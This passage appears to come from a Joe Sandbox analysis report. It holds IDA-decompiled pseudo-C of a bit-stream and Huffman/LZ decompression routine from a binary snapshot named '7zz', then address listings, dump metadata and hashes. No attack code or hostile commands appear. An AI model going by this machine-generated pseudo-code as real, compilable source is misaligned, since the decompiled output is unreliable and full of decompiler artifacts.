				unsigned int _t501;
				signed int _t504;
				intOrPtr _t505;
				intOrPtr _t508;
				intOrPtr _t511;
				signed int _t513;
				signed int _t514;
				signed int* _t515;
				intOrPtr* _t516;
				signed int _t517;
				signed int* _t518;
				signed int _t519;
				void* _t522;
				void* _t523;

				_t522 = __ecx;
				if( *(__ecx + 0x1cbc) == 0xfffffffe) {
					_t518 = __ecx + 8;
					 *(__ecx + 0x1cbc) = 0;
					E0040DFF3(_t518);
					_t518[9] = 0x20;
					if( *((intOrPtr*)(__ecx + 0x1cb8)) == 0 ||  *((intOrPtr*)(__ecx + 0x68)) == 0) {
						if(_t518[9] >= 0x10) {
							do {
								_t303 =  *_t518;
								if(_t303 < _t518[1]) {
									_t304 = _t303 + 1;
									__eflags = _t304;
									 *(_t523 + 0x14) =  *_t303;
									 *_t518 = _t304;
								} else {
									 *(_t523 + 0x14) = E0040E070(_t518);
								}
								_t305 =  *_t518;
								if(_t305 < _t518[1]) {
									_t306 = _t305 + 1;
									__eflags = _t306;
									 *(_t523 + 0x18) =  *_t305;
									 *_t518 = _t306;
								} else {
									 *(_t523 + 0x18) = E0040E070(_t518);
								}
								_t425 = _t518[9] + 0xfffffff0;
								_t518[9] = _t425;
								_t518[8] = (_t518[8] << 0x00000008 |  *(_t523 + 0x18) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x14) & 0x000000ff;
							} while (_t425 >= 0x10);
						}
					}
					if( *((intOrPtr*)(_t522 + 0x1cb8)) == 0) {
						 *((char*)(_t522 + 0x1cc0)) = 0;
						 *(_t522 + 0x1cb4) = 0;
						E004514C0(_t522);
						_t519 = 0xb71b00;
						_t330 = 1;
						if( *((intOrPtr*)(_t522 + 0x1cc1)) == 0) {
							_t330 = 0 | E00450B20(1) != 0x00000000;
							if(1 != 0) {
								_t301 = E00450B20(0x10);
								_t519 = _t301 << 0x00000010 | E00450B20(0x10);
							}
						}
						_t298 =  *((intOrPtr*)(_t522 + 0x1cac));
						 *(_t298 + 0x18) = _t330;
						 *(_t298 + 0x14) = _t519;
						 *((intOrPtr*)(_t298 + 0xc)) = 0;
						 *((intOrPtr*)(_t298 + 0x10)) = 0;
						 *(_t522 + 0x58) = 0;
						 *(_t522 + 0x5c) = 0;
						 *(_t522 + 0x60) = 0;
					}
				}
				if( *(_t522 + 0x1cbc) <= 0) {
					_t514 =  *(_t523 + 0x40);
					goto L25;
				} else {
					while(1) {
						_t517 =  *(_t523 + 0x40);
						if(_t517 <= 0) {
							break;
						}
						_t412 = _t522 + 0x30;
						_t288 =  *((intOrPtr*)(_t522 + 0x34)) -  *(_t522 + 0x58) - 1;
						_t466 =  *((intOrPtr*)(_t412 + 0x10));
						if(_t288 >= _t466) {
							_t288 = _t288 + _t466;
						}
						 *((char*)( *((intOrPtr*)(_t412 + 4)) +  *_t412)) =  *((intOrPtr*)(_t288 +  *_t412));
						_t511 =  *((intOrPtr*)(_t412 + 4)) + 1;
						 *((intOrPtr*)(_t412 + 4)) = _t511;
						_t541 = _t511 -  *((intOrPtr*)(_t412 + 8));
						if(_t511 ==  *((intOrPtr*)(_t412 + 8))) {
							L0040EFBD(_t412, _t541);
						}
						_t513 =  *(_t522 + 0x1cbc) - 1;
						_t514 = _t517 - 1;
						 *(_t522 + 0x1cbc) = _t513;
						 *(_t523 + 0x40) = _t514;
						if(_t513 > 0) {
							continue;
						} else {
							L25:
							if(_t514 <= 0) {
								break;
							} else {
								while( *(_t522 + 0x1cb4) != 0 || E00451050(_t522) != 0) {
									_t218 =  *(_t522 + 0x1cb4);
									_t332 = _t218;
									if(_t218 >= _t514) {
										_t332 = _t514;
									}
									_t514 = _t514 - _t332;
									 *(_t522 + 0x1cb4) = _t218 - _t332;
									 *(_t523 + 0x10) = _t332;
									 *(_t523 + 0x40) = _t514;
									if( *((intOrPtr*)(_t522 + 0x68)) == 0) {
										__eflags = _t332;
										if(_t332 <= 0) {
											goto L99;
										} else {
											_t515 = _t522 + 8;
											do {
												_t477 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
												__eflags = _t477 -  *((intOrPtr*)(_t522 + 0x90));
												if(_t477 >=  *((intOrPtr*)(_t522 + 0x90))) {
													_t223 = _t522 + 0x94;
													__eflags = _t477 -  *((intOrPtr*)(_t522 + 0x94));
													_t318 = 0xa;
													if(_t477 >=  *((intOrPtr*)(_t522 + 0x94))) {
														do {
															_t405 =  *((intOrPtr*)(_t223 + 4));
															_t223 = _t223 + 4;
															_t318 = _t318 + 1;
															__eflags = _t477 - _t405;
														} while (_t477 >= _t405);
													}
												} else {
													_t318 =  *((intOrPtr*)((_t477 >> 7) + _t522 + 0xb34));
												}
												_t338 = _t515[9] + _t318;
												_t224 = _t338;
												_t515[9] = _t338;
												__eflags = _t224 - 0x10;
												while(_t224 >= 0x10) {
													_t273 =  *_t515;
													__eflags = _t273 - _t515[1];
													if(_t273 < _t515[1]) {
														_t274 = _t273 + 1;
														__eflags = _t274;
														 *(_t523 + 0x1c) =  *_t273;
														 *_t515 = _t274;
													} else {
														 *(_t523 + 0x1c) = E0040E070(_t515);
													}
													 *(_t523 + 0x24) = E00451BF0(_t515);
													_t403 = _t515[9] + 0xfffffff0;
													_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x24) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x1c) & 0x000000ff;
													_t224 = _t403;
													_t515[9] = _t403;
													__eflags = _t224 - 0x10;
												}
												_t480 = (_t477 -  *((intOrPtr*)(_t522 + 0x68 + _t318 * 4)) >> 0x10 - _t318) +  *((intOrPtr*)(_t522 + 0xb0 + _t318 * 4));
												__eflags = _t480 - 0x290;
												if(_t480 < 0x290) {
													_t225 =  *(_t522 + 0xf4 + _t480 * 4);
													__eflags = _t225 - 0x100;
													if(_t225 >= 0x100) {
														goto L53;
													} else {
														_t396 = _t522 + 0x30;
														 *( *((intOrPtr*)(_t522 + 0x30)) +  *((intOrPtr*)(_t522 + 0x34))) = _t225;
														_t508 =  *((intOrPtr*)(_t396 + 4)) + 1;
														 *((intOrPtr*)(_t396 + 4)) = _t508;
														__eflags = _t508 -  *((intOrPtr*)(_t396 + 8));
														if(__eflags == 0) {
															L0040EFBD(_t396, __eflags);
														}
														 *(_t523 + 0x10) =  *(_t523 + 0x10) - 1;
														goto L97;
													}
												} else {
													_t225 = _t224 | 0xffffffff;
													__eflags = _t225;
													L53:
													_t226 = _t225 + 0xffffff00;
													__eflags = _t226 -  *((intOrPtr*)(_t522 + 0x64));
													if(_t226 >=  *((intOrPtr*)(_t522 + 0x64))) {
														goto L101;
													} else {
														_t228 = _t226 & 0x00000007;
														_t320 = _t226 >> 3;
														_t92 = _t228 + 2; // -4290437306
														__eflags = (_t226 & 0x00000007) - 7;
														 *(_t523 + 0x14) = _t92;
														if((_t226 & 0x00000007) != 7) {
															L73:
															__eflags = _t320 - 3;
															if(_t320 >= 3) {
																__eflags = _t320 - 0x26;
																if(_t320 >= 0x26) {
																	_t229 = 0x11;
																	_t322 = _t320 + 0x7fde << 0x11;
																	__eflags = _t322;
																} else {
																	_t229 = (_t320 >> 1) - 1;
																	_t322 = (_t320 & 0x00000001 | 0x00000002) << _t229;
																}
																__eflags =  *(_t522 + 0x69);
																if( *(_t522 + 0x69) == 0) {
																	L91:
																	_t431 = _t515[9];
																	_t515[9] = _t431 + _t229;
																	E00450FC0(_t515);
																	_t323 = _t322 + ((_t515[8] >> 0x0000000f - _t431 & 0x0001ffff) >> 0x11 - _t229);
																	__eflags = _t323;
																	 *(_t523 + 0x18) = _t323;
																	goto L92;
																} else {
																	__eflags = _t229 - 3;
																	if(_t229 < 3) {
																		goto L91;
																	} else {
																		_t437 = _t515[9];
																		_t238 = _t229 + 0xfffffffd;
																		_t239 = _t238 + _t437;
																		_t515[9] = _t239;
																		_t489 = (_t515[8] >> 0x0000000f - _t437 & 0x0001ffff) >> 0x11 - _t238;
																		__eflags = _t239 - 0x10;
																		if(_t239 >= 0x10) {
																			do {
																				 *(_t523 + 0x30) = E00451BF0(_t515);
																				 *(_t523 + 0x2c) = E00451BF0(_t515);
																				_t379 = _t515[9] + 0xfffffff0;
																				_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x2c) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x30) & 0x000000ff;
																				__eflags = _t379 - 0x10;
																				_t515[9] = _t379;
																			} while (_t379 >= 0x10);
																		}
																		 *(_t523 + 0x18) = _t322 + _t489 * 8;
																		_t493 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
																		__eflags = _t493 -  *((intOrPtr*)(_t522 + 0x13c4));
																		if(_t493 >=  *((intOrPtr*)(_t522 + 0x13c4))) {
																			_t243 = _t522 + 0x13c8;
																			__eflags = _t493 -  *((intOrPtr*)(_t522 + 0x13c8));
																			_t325 = 0xa;
																			if(_t493 >=  *((intOrPtr*)(_t522 + 0x13c8))) {
																				do {
																					_t371 =  *((intOrPtr*)(_t243 + 4));
																					_t243 = _t243 + 4;
																					_t325 = _t325 + 1;
																					__eflags = _t493 - _t371;
																				} while (_t493 >= _t371);
																			}
																		} else {
																			_t325 =  *((intOrPtr*)((_t493 >> 7) + _t522 + 0x1448));
																		}
																		_t361 = _t515[9] + _t325;
																		_t515[9] = _t361;
																		__eflags = _t361 - 0x10;
																		if(_t361 >= 0x10) {
																			do {
																				 *(_t523 + 0x38) = E00451BF0(_t515);
																				 *(_t523 + 0x34) = E00451BF0(_t515);
																				_t370 = _t515[9] + 0xfffffff0;
																				_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x34) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x38) & 0x000000ff;
																				_t515[9] = _t370;
																				__eflags = _t370 - 0x10;
																			} while (_t370 >= 0x10);
																		}
																		_t496 = (_t493 -  *((intOrPtr*)(_t522 + 0x139c + _t325 * 4)) >> 0x10 - _t325) +  *((intOrPtr*)(_t522 + 0x13e4 + _t325 * 4));
																		__eflags = _t496 - 8;
																		if(_t496 >= 8) {
																			goto L101;
																		} else {
																			_t497 =  *((intOrPtr*)(_t522 + 0x1428 + _t496 * 4));
																			__eflags = _t497 - 8;
																			if(_t497 >= 8) {
																				goto L101;
																			} else {
																				 *(_t523 + 0x18) =  *(_t523 + 0x18) + _t497;
																				L92:
																				_t351 =  *(_t523 + 0x18) + 0xfffffffd;
																				__eflags = _t351;
																				 *(_t522 + 0x60) =  *(_t522 + 0x5c);
																				 *(_t522 + 0x5c) =  *(_t522 + 0x58);
																				 *(_t522 + 0x58) = _t351;
																				goto L93;
																			}
																		}
																	}
																}
															} else {
																 *(_t522 + 0x58 + _t320 * 4) =  *(_t522 + 0x58);
																 *(_t522 + 0x58) =  *(_t522 + 0x58 + _t320 * 4);
																L93:
																_t485 =  *(_t523 + 0x14);
																_t232 =  *(_t523 + 0x10);
																__eflags = _t485 - _t232;
																if(_t485 > _t232) {
																	_t485 = _t232;
																}
																_push(_t485);
																_push( *(_t522 + 0x58));
																_t233 = L0044ADB0(_t522 + 0x30);
																__eflags = _t233;
																if(_t233 == 0) {
																	goto L101;
																} else {
																	_t235 =  *(_t523 + 0x14) - _t485;
																	__eflags = _t235;
																	 *(_t523 + 0x14) = _t235;
																	 *(_t523 + 0x10) =  *(_t523 + 0x10) - _t485;
																	if(_t235 != 0) {
																		 *(_t522 + 0x1cbc) =  *(_t523 + 0x14);
																		goto L103;
																	} else {
																		goto L97;
																	}
																}
															}
														} else {
															_t501 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
															__eflags = _t501 -  *((intOrPtr*)(_t522 + 0xd58));
															if(_t501 >=  *((intOrPtr*)(_t522 + 0xd58))) {
																_t383 = _t522 + 0xd5c;
																_t262 = 0xa;
																__eflags = _t501 -  *((intOrPtr*)(_t522 + 0xd5c));
																 *(_t523 + 0x18) = 0xa;
																if(_t501 >=  *((intOrPtr*)(_t522 + 0xd5c))) {
																	do {
																		_t455 =  *((intOrPtr*)(_t383 + 4));
																		_t383 = _t383 + 4;
																		_t262 = _t262 + 1;
																		__eflags = _t501 - _t455;
																	} while (_t501 >= _t455);
																	goto L63;
																}
															} else {
																_t262 =  *((intOrPtr*)((_t501 >> 7) + _t522 + 0x11a0));
																L63:
																 *(_t523 + 0x18) = _t262;
															}
															_t449 = _t515[9] + _t262;
															_t515[9] = _t449;
															__eflags = _t449 - 0x10;
															if(_t449 >= 0x10) {
																do {
																	_t263 =  *_t515;
																	__eflags = _t263 - _t515[1];
																	if(_t263 < _t515[1]) {
																		_t264 = _t263 + 1;
																		__eflags = _t264;
																		 *(_t523 + 0x20) =  *_t263;
																		 *_t515 = _t264;
																	} else {
																		 *(_t523 + 0x20) = E0040E070(_t515);
																	}
																	 *(_t523 + 0x28) = E00451BF0(_t515);
																	_t394 = _t515[9] + 0xfffffff0;
																	_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x28) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x20) & 0x000000ff;
																	_t515[9] = _t394;
																	__eflags = _t394 - 0x10;
																} while (_t394 >= 0x10);
																_t262 =  *(_t523 + 0x18);
															}
															_t504 = (_t501 -  *((intOrPtr*)(_t522 + 0xd30 + _t262 * 4)) >> 0x10 - _t262) +  *((intOrPtr*)(_t522 + 0xd78 + _t262 * 4));
															__eflags = _t504 - 0xf9;
															if(_t504 >= 0xf9) {
																goto L101;
															} else {
																_t505 =  *((intOrPtr*)(_t522 + 0xdbc + _t504 * 4));
																__eflags = _t505 - 0xf9;
																if(_t505 >= 0xf9) {
																	goto L101;
																} else {
																	_t138 = _t523 + 0x14;
																	 *_t138 =  *(_t523 + 0x14) + _t505;
																	__eflags =  *_t138;
																	goto L73;
																}
															}
														}
													}
												}
												goto L104;
												L97:
												__eflags =  *(_t523 + 0x10);
											} while ( *(_t523 + 0x10) > 0);
											goto L98;
										}
									} else {
										if(_t332 > 0) {
											_t473 = _t522 + 8;
											_t516 = _t522 + 0x30;
											_t317 = _t332;
											do {
												_t406 =  *_t473;
												if(_t406 < _t473[1]) {
													_t282 =  *_t406;
													_t407 = _t406 + 1;
													__eflags = _t407;
													 *_t473 = _t407;
												} else {
													_t282 = E0040E070(_t473);
												}
												 *((char*)( *_t516 +  *((intOrPtr*)(_t516 + 4)))) = _t282;
												_t430 =  *((intOrPtr*)(_t516 + 4)) + 1;
												 *((intOrPtr*)(_t516 + 4)) = _t430;
												_t550 = _t430 -  *((intOrPtr*)(_t516 + 8));
												if(_t430 ==  *((intOrPtr*)(_t516 + 8))) {
													L0040EFBD(_t516, _t550);
												}
												_t317 = _t317 - 1;
											} while (_t317 != 0);
											L98:
											_t514 =  *(_t523 + 0x40);
										}
										L99:
										if(_t514 <= 0) {
											goto L103;
										} else {
											continue;
										}
									}
									goto L104;
								}
								L101:
								return 1;
							}
						}
						goto L104;
					}
					L103:
					__eflags = 0;
					return 0;
				}
				L104:
			}















































































                                                                                  0x004514f5
                                                                                  0x0045150c
                                                                                  0x00451512
                                                                                  0x00451515
                                                                                  0x00451521
                                                                                  0x00451526
                                                                                  0x00451535
                                                                                  0x00451541
                                                                                  0x00451543
                                                                                  0x00451543
                                                                                  0x0045154a
                                                                                  0x0045155b
                                                                                  0x0045155b
                                                                                  0x0045155c
                                                                                  0x00451560
                                                                                  0x0045154c
                                                                                  0x00451553
                                                                                  0x00451553
                                                                                  0x00451562
                                                                                  0x00451569
                                                                                  0x0045157a
                                                                                  0x0045157a
                                                                                  0x0045157b
                                                                                  0x0045157f
                                                                                  0x0045156b
                                                                                  0x00451572
                                                                                  0x00451572
                                                                                  0x004515a3
                                                                                  0x004515a7
                                                                                  0x004515aa
                                                                                  0x004515af
                                                                                  0x00451543
                                                                                  0x00451541
                                                                                  0x004515bb
                                                                                  0x004515bf
                                                                                  0x004515c6
                                                                                  0x004515d0
                                                                                  0x004515db
                                                                                  0x004515e2
                                                                                  0x004515e4
                                                                                  0x004515f1
                                                                                  0x004515f6
                                                                                  0x004515fb
                                                                                  0x0045160d
                                                                                  0x0045160d
                                                                                  0x004515f6
                                                                                  0x0045160f
                                                                                  0x00451617
                                                                                  0x0045161a
                                                                                  0x0045161d
                                                                                  0x00451620
                                                                                  0x00451625
                                                                                  0x00451628
                                                                                  0x0045162b
                                                                                  0x0045162b
                                                                                  0x004515bb
                                                                                  0x00451636
                                                                                  0x00451695
                                                                                  0x00000000
                                                                                  0x00451638
                                                                                  0x00451638
                                                                                  0x00451638
                                                                                  0x0045163e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0045164a
                                                                                  0x0045164f
                                                                                  0x00451650
                                                                                  0x00451655
                                                                                  0x00451657
                                                                                  0x00451657
                                                                                  0x00451663
                                                                                  0x0045166c
                                                                                  0x0045166f
                                                                                  0x00451672
                                                                                  0x00451674
                                                                                  0x00451676
                                                                                  0x00451676
                                                                                  0x00451681
                                                                                  0x00451682
                                                                                  0x00451685
                                                                                  0x0045168d
                                                                                  0x00451691
                                                                                  0x00000000
                                                                                  0x00451693
                                                                                  0x00451699
                                                                                  0x0045169b
                                                                                  0x00000000
                                                                                  0x004516a1
                                                                                  0x004516a1
                                                                                  0x004516ba
                                                                                  0x004516c2
                                                                                  0x004516c4
                                                                                  0x004516c6
                                                                                  0x004516c6
                                                                                  0x004516ca
                                                                                  0x004516cc
                                                                                  0x004516d7
                                                                                  0x004516db
                                                                                  0x004516df
                                                                                  0x0045172f
                                                                                  0x00451731
                                                                                  0x00000000
                                                                                  0x00451737
                                                                                  0x00451737
                                                                                  0x0045173a
                                                                                  0x00451751
                                                                                  0x00451757
                                                                                  0x00451759
                                                                                  0x00451771
                                                                                  0x00451777
                                                                                  0x00451779
                                                                                  0x0045177e
                                                                                  0x00451780
                                                                                  0x00451780
                                                                                  0x00451783
                                                                                  0x00451786
                                                                                  0x00451787
                                                                                  0x00451787
                                                                                  0x00451780
                                                                                  0x0045175b
                                                                                  0x00451762
                                                                                  0x00451762
                                                                                  0x0045178e
                                                                                  0x00451790
                                                                                  0x00451792
                                                                                  0x00451795
                                                                                  0x00451798
                                                                                  0x0045179a
                                                                                  0x0045179f
                                                                                  0x004517a1
                                                                                  0x004517b2
                                                                                  0x004517b2
                                                                                  0x004517b3
                                                                                  0x004517b7
                                                                                  0x004517a3
                                                                                  0x004517aa
                                                                                  0x004517aa
                                                                                  0x004517c7
                                                                                  0x004517e7
                                                                                  0x004517ea
                                                                                  0x004517ed
                                                                                  0x004517ef
                                                                                  0x004517f2
                                                                                  0x004517f2
                                                                                  0x00451806
                                                                                  0x0045180d
                                                                                  0x00451813
                                                                                  0x00451871
                                                                                  0x00451878
                                                                                  0x0045187d
                                                                                  0x00000000
                                                                                  0x0045187f
                                                                                  0x00451885
                                                                                  0x00451888
                                                                                  0x00451891
                                                                                  0x00451894
                                                                                  0x00451897
                                                                                  0x00451899
                                                                                  0x0045189b
                                                                                  0x0045189b
                                                                                  0x004518a0
                                                                                  0x00000000
                                                                                  0x004518a0
                                                                                  0x00451815
                                                                                  0x00451815
                                                                                  0x00451815
                                                                                  0x00451818
                                                                                  0x0045181b
                                                                                  0x00451820
                                                                                  0x00451822
                                                                                  0x00000000
                                                                                  0x00451828
                                                                                  0x0045182a
                                                                                  0x0045182d
                                                                                  0x00451830
                                                                                  0x00451833
                                                                                  0x00451836
                                                                                  0x0045183a
                                                                                  0x0045197d
                                                                                  0x0045197d
                                                                                  0x00451980
                                                                                  0x00451995
                                                                                  0x00451998
                                                                                  0x004519b1
                                                                                  0x004519b6
                                                                                  0x004519b6
                                                                                  0x0045199a
                                                                                  0x004519a1
                                                                                  0x004519a7
                                                                                  0x004519a7
                                                                                  0x004519bc
                                                                                  0x004519be
                                                                                  0x00451b2a
                                                                                  0x00451b2a
                                                                                  0x00451b40
                                                                                  0x00451b4f
                                                                                  0x00451b54
                                                                                  0x00451b54
                                                                                  0x00451b56
                                                                                  0x00000000
                                                                                  0x004519c4
                                                                                  0x004519c4
                                                                                  0x004519c7
                                                                                  0x00000000
                                                                                  0x004519cd
                                                                                  0x004519cd
                                                                                  0x004519d8
                                                                                  0x004519e6
                                                                                  0x004519e8
                                                                                  0x004519f1
                                                                                  0x004519f3
                                                                                  0x004519f6
                                                                                  0x004519f8
                                                                                  0x00451a01
                                                                                  0x00451a0e
                                                                                  0x00451a32
                                                                                  0x00451a35
                                                                                  0x00451a3a
                                                                                  0x00451a3d
                                                                                  0x00451a3d
                                                                                  0x004519f8
                                                                                  0x00451a48
                                                                                  0x00451a60
                                                                                  0x00451a66
                                                                                  0x00451a68
                                                                                  0x00451a80
                                                                                  0x00451a86
                                                                                  0x00451a88
                                                                                  0x00451a8d
                                                                                  0x00451a8f
                                                                                  0x00451a8f
                                                                                  0x00451a92
                                                                                  0x00451a95
                                                                                  0x00451a96
                                                                                  0x00451a96
                                                                                  0x00451a8f
                                                                                  0x00451a6a
                                                                                  0x00451a71
                                                                                  0x00451a71
                                                                                  0x00451a9d
                                                                                  0x00451aa1
                                                                                  0x00451aa4
                                                                                  0x00451aa7
                                                                                  0x00451aa9
                                                                                  0x00451ab2
                                                                                  0x00451ac2
                                                                                  0x00451ae2
                                                                                  0x00451ae5
                                                                                  0x00451aea
                                                                                  0x00451aed
                                                                                  0x00451aed
                                                                                  0x00451aa9
                                                                                  0x00451b04
                                                                                  0x00451b0b
                                                                                  0x00451b0e
                                                                                  0x00000000
                                                                                  0x00451b14
                                                                                  0x00451b14
                                                                                  0x00451b1b
                                                                                  0x00451b1e
                                                                                  0x00000000
                                                                                  0x00451b24
                                                                                  0x00451b24
                                                                                  0x00451b5a
                                                                                  0x00451b64
                                                                                  0x00451b64
                                                                                  0x00451b67
                                                                                  0x00451b6a
                                                                                  0x00451b6d
                                                                                  0x00000000
                                                                                  0x00451b6d
                                                                                  0x00451b1e
                                                                                  0x00451b0e
                                                                                  0x004519c7
                                                                                  0x00451982
                                                                                  0x00451989
                                                                                  0x0045198d
                                                                                  0x00451b70
                                                                                  0x00451b70
                                                                                  0x00451b74
                                                                                  0x00451b78
                                                                                  0x00451b7a
                                                                                  0x00451b7c
                                                                                  0x00451b7c
                                                                                  0x00451b81
                                                                                  0x00451b82
                                                                                  0x00451b86
                                                                                  0x00451b8b
                                                                                  0x00451b8d
                                                                                  0x00000000
                                                                                  0x00451b8f
                                                                                  0x00451b97
                                                                                  0x00451b9b
                                                                                  0x00451b9d
                                                                                  0x00451ba1
                                                                                  0x00451ba5
                                                                                  0x00451bd3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00451ba5
                                                                                  0x00451b8d
                                                                                  0x00451840
                                                                                  0x00451857
                                                                                  0x0045185d
                                                                                  0x0045185f
                                                                                  0x004518af
                                                                                  0x004518b5
                                                                                  0x004518ba
                                                                                  0x004518bc
                                                                                  0x004518c0
                                                                                  0x004518c2
                                                                                  0x004518c2
                                                                                  0x004518c5
                                                                                  0x004518c8
                                                                                  0x004518c9
                                                                                  0x004518c9
                                                                                  0x00000000
                                                                                  0x004518c2
                                                                                  0x00451861
                                                                                  0x00451868
                                                                                  0x004518cd
                                                                                  0x004518cd
                                                                                  0x004518cd
                                                                                  0x004518d4
                                                                                  0x004518d8
                                                                                  0x004518db
                                                                                  0x004518de
                                                                                  0x004518e0
                                                                                  0x004518e0
                                                                                  0x004518e5
                                                                                  0x004518e7
                                                                                  0x004518f8
                                                                                  0x004518f8
                                                                                  0x004518f9
                                                                                  0x004518fd
                                                                                  0x004518e9
                                                                                  0x004518f0
                                                                                  0x004518f0
                                                                                  0x0045190d
                                                                                  0x0045192d
                                                                                  0x00451930
                                                                                  0x00451935
                                                                                  0x00451938
                                                                                  0x00451938
                                                                                  0x0045193d
                                                                                  0x0045193d
                                                                                  0x00451953
                                                                                  0x0045195a
                                                                                  0x00451960
                                                                                  0x00000000
                                                                                  0x00451966
                                                                                  0x00451966
                                                                                  0x0045196d
                                                                                  0x00451973
                                                                                  0x00000000
                                                                                  0x00451979
                                                                                  0x00451979
                                                                                  0x00451979
                                                                                  0x00451979
                                                                                  0x00000000
                                                                                  0x00451979
                                                                                  0x00451973
                                                                                  0x00451960
                                                                                  0x0045183a
                                                                                  0x00451822
                                                                                  0x00000000
                                                                                  0x00451ba7
                                                                                  0x00451bab
                                                                                  0x00451bab
                                                                                  0x00000000
                                                                                  0x0045173a
                                                                                  0x004516e1
                                                                                  0x004516e3
                                                                                  0x004516e9
                                                                                  0x004516ec
                                                                                  0x004516ef
                                                                                  0x004516f1
                                                                                  0x004516f1
                                                                                  0x004516f8
                                                                                  0x00451703
                                                                                  0x00451705
                                                                                  0x00451705
                                                                                  0x00451706
                                                                                  0x004516fa
                                                                                  0x004516fc
                                                                                  0x004516fc
                                                                                  0x0045170d
                                                                                  0x00451716
                                                                                  0x00451719
                                                                                  0x0045171c
                                                                                  0x0045171e
                                                                                  0x00451722
                                                                                  0x00451722
                                                                                  0x00451727
                                                                                  0x00451727
                                                                                  0x00451bb3
                                                                                  0x00451bb3
                                                                                  0x00451bb3
                                                                                  0x00451bb7
                                                                                  0x00451bb9
                                                                                  0x00000000
                                                                                  0x00451bbb
                                                                                  0x00000000
                                                                                  0x00451bbb
                                                                                  0x00451bb9
                                                                                  0x00000000
                                                                                  0x004516df
                                                                                  0x00451bc3
                                                                                  0x00451bcc
                                                                                  0x00451bcc
                                                                                  0x0045169b
                                                                                  0x00000000
                                                                                  0x00451691
                                                                                  0x00451bdc
                                                                                  0x00451bdc
                                                                                  0x00451be2
                                                                                  0x00451be2
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
                                                                                  • Instruction ID: 56e6f142235e9d3d76dd4b9a838b0ae8b43fc399745457aca84a280bb1d57964
                                                                                  • Opcode Fuzzy Hash: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
                                                                                  • Instruction Fuzzy Hash: 3E22C9317046458FC728CF2DC5907AA77E2AFC5305F144A2EE89AC7792D738E849CB89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00461EF0 Relevance: .6, Instructions: 556COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 85%
                                                                                  			E00461EF0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t294;
				intOrPtr _t295;
				signed int _t296;
				signed int _t300;
				unsigned int _t304;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				unsigned int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t324;
				signed int _t327;
				void* _t329;
				void* _t338;
				signed int _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				unsigned int _t358;
				signed int _t360;
				unsigned int _t362;
				signed int _t364;
				signed int _t374;
				signed int _t376;
				signed int _t377;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t388;
				signed int _t390;
				signed int _t392;
				signed int _t394;
				signed int _t395;
				intOrPtr* _t398;
				signed int _t405;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t417;
				void* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t438;
				signed int _t449;
				signed int _t452;
				signed int* _t459;
				signed int _t474;
				signed int _t479;
				signed int _t484;
				signed int _t500;
				unsigned int _t508;
				signed int _t510;
				signed int _t525;
				void* _t537;
				signed int _t539;
				unsigned int _t550;
				unsigned int _t553;
				unsigned int _t555;
				signed int _t562;
				signed int _t570;
				signed int _t589;
				signed short* _t604;
				unsigned int _t605;
				signed int* _t606;
				signed short* _t612;
				signed short* _t613;
				signed int* _t622;
				intOrPtr* _t624;
				void* _t625;

				_t624 =  *((intOrPtr*)(_t625 + 0x1c));
				if( *((intOrPtr*)(_t624 + 0x3bd10)) != 0) {
					 *((intOrPtr*)( *_t624))();
					 *((intOrPtr*)(_t624 + 0x3bd10)) = 0;
				}
				_t294 =  *((intOrPtr*)(_t624 + 0x3bd04));
				if( *((intOrPtr*)(_t624 + 0x3bcfc)) != 0 || _t294 != 0) {
					return _t294;
				} else {
					if( *((intOrPtr*)(_t624 + 0x3bce0)) != _t294) {
						 *((intOrPtr*)(_t624 + 0x3bd04)) = 9;
					}
					if( *((intOrPtr*)(_t624 + 0x208)) != 0) {
						 *((intOrPtr*)(_t624 + 0x3bd04)) = 8;
					}
					_t295 =  *((intOrPtr*)(_t624 + 0x3bd04));
